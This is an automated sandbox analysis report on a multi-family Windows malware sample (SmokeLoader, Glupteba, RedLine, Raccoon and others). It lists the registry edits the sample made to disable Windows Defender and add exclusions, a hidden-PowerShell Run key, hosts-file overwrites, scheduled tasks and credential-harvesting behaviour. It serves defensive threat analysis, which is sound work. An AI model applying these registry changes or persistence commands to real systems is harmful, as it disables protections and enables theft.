Malware Analysis Report

2025-06-16 01:30

Sample ID 231031-dpwzdaac55
Target 0x0007000000022ce0-53.dat
SHA256 bbde9add91e60b172dee5adb8c6436e07c2adccfc230f1f82454542db4a204f4
Tags
smokeloader amadey dcrat glupteba raccoon redline sectoprat zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza pixelnew up3 backdoor collection discovery dropper evasion infostealer loader persistence rat rootkit spyware stealer trojan xmrig paypal miner phishing upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bbde9add91e60b172dee5adb8c6436e07c2adccfc230f1f82454542db4a204f4

Threat Level: Known bad

The file 0x0007000000022ce0-53.dat was found to be: Known bad.

Malicious Activity Summary

Glupteba payload

RedLine payload

Glupteba

RedLine

ZGRat

Suspicious use of NtCreateUserProcessOtherParentProcess

Smokeloader family

Amadey

Raccoon

SmokeLoader

SectopRAT

Raccoon Stealer payload

Modifies Windows Defender Real-time Protection settings

Detect ZGRat V1

xmrig

DcRat

SectopRAT payload

Windows security bypass

Modifies boot configuration data using bcdedit

XMRig Miner payload

Downloads MZ/PE file

Modifies Windows Firewall

Drops file in Drivers directory

Possible attempt to disable PatchGuard

Stops running service(s)

Deletes itself

Windows security modification

Executes dropped EXE

UPX packed file

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Adds Run key to start application

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Manipulates WinMon driver.

Manipulates WinMonFS driver.

Looks up external IP address via web service

Suspicious use of SetThreadContext

Detected potential entity reuse from brand paypal.

Drops file in System32 directory

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Unsigned PE

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Modifies data under HKEY_USERS

Suspicious behavior: LoadsDriver

Modifies system certificate store

Enumerates system info in registry

outlook_win_path

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Modifies Internet Explorer settings

outlook_office_path

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-31 03:11

Signatures

Smokeloader family

smokeloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-31 03:11

Reported

2023-10-31 03:14

Platform

win7-20231025-en

Max time kernel

147s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\8C8B.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8C8B.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\8C8B.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\8C8B.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8C8B.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\8C8B.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

ZGRat

rat zgrat

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\F68A.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8594.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8798.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8A39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8C8B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\934F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9968.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B5BF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C682.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DFED.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EC8B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F68A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FB7B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8594.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8594.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\934F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B5BF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B5BF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B5BF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B5BF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B5BF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B5BF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EC8B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EC8B.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DFED.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\8C8B.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\8C8B.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F68A.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F68A.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F68A.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F68A.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F68A.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\C682.exe'\"" C:\Users\Admin\AppData\Local\Temp\C682.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\8594.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20231031031256.cab C:\Windows\system32\makecab.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0f49d17a80bda01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "405486902" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (binary value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
